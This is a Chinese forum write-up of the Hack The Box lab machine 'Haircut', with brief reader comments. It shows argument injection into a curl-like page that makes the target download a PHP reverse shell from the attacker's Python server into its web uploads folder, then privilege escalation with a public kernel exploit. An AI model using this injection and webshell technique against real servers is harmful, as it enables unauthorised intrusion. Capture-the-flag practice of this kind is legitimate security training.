HTB靶场记录(五 Haircut)

皮卡皮卡丘

0x00:靶机介绍
这次的靶机是Haircut难度为中等。其实只是getshell的时候多留意多观察一下就行了。提权不难


0x01:信息收集
首先先进行端口探测先,先用autorecon进行端口探测让它自己慢慢跑我去瑞幸吃早晨


吃完以后回来，看到跑完了典型的开了22和80端口那就可以启动Dirbuster目录扫描工具了



当然还是建议把IP输到浏览器里面看看可不可以正常访问先，正常访问可以的话再进行目录扫描


玩了回手机目录扫描完了,扫到一个uploads目录不过403还有一个exposed.php的页面



0x02:挖掘漏洞
我们跟过去exposed那里看看,有个输入框，输入靶机存在的页面会加载出来。比如说10.10.10.24/index.html就会加载回主页出来


当然一开始看到输入框SQL注入肌肉记忆激活，OS命令| && ||逐一尝试均失败,这时候重新观察回这个功能，该功能是有点类似curl 把一个IP的文件执行出来，这里我的思路是用python共享服务文件出去，看看能不能访问我的文件。最近在学HTML。写了点菜鸡文件。试了下可以执行出来。
python共享命令:
python -m http.server 8081
插入到框框内的命令:http://10.10.14.29:8081/1.html



那么接下来就是尝试一下能不能执行波远程PHP文件了,我先写了个最简单的Hello World 的代码结果执行不了。。。。



虽然在python记录那里是访问了一波本地但出了点问题。。。。


0x03:破局思路

这里我回到index.html主页那里查看了波源代码发现加载的是bounce.jpg。一般这种可能是在/var/www/html/xxx页面(这是个linux靶机)。关于uploads文件夹我思考着可不可能那里是存放文件/图片的地方了?如果可以的话理论上我在浏览器输入bounce.jpg是可以访问的前提没有限制。毕竟uploads翻译过来是上传文件的地方。理论上也是会存放着这张图片的。虽然uploads文件夹是403但是不代表其目录下的文件不可访问


这里试了一下验证了我的思路。uploads下确实存放着Index.html的图片



这里再次尝试把刚才的hello world文件插入到输入框然后尝试在后面加入路径
命令:http://10.10.14.29:8081/2.php -o /var/www/html/uploads/2.php



访问一下执行成功


这里把我们的反弹马准备好把命令稍微改一下
命令:http://10.10.14.29:8081/1.php -o /var/www/html/uploads/1.php


提前开启netcat,在浏览器访问10.10.10.24/uploads/1.php,成功得到shell顺便可以读取user的flag


0x04:提权
这里我试了一下Uname -a,噢居然是4.4.0-78,这不就跟上个靶机Europa很类似嘛?


幸好没把payload删了直接把44298.c已经编译好的文件传上去，给完权限以后直接运行成功变成root

感谢分享

皮卡丘师傅的靶场系列更新了  

tqltql

就想问一句 是不是就我一个人发现了lz在ghs？！！！！

哈哈哈哈啊  一定是你想歪了

哈哈哈哈哈

超越 发表于 2021-1-25 08:44
就想问一句 是不是就我一个人发现了lz在ghs？！！！！

。。。。。。。。。。。。。。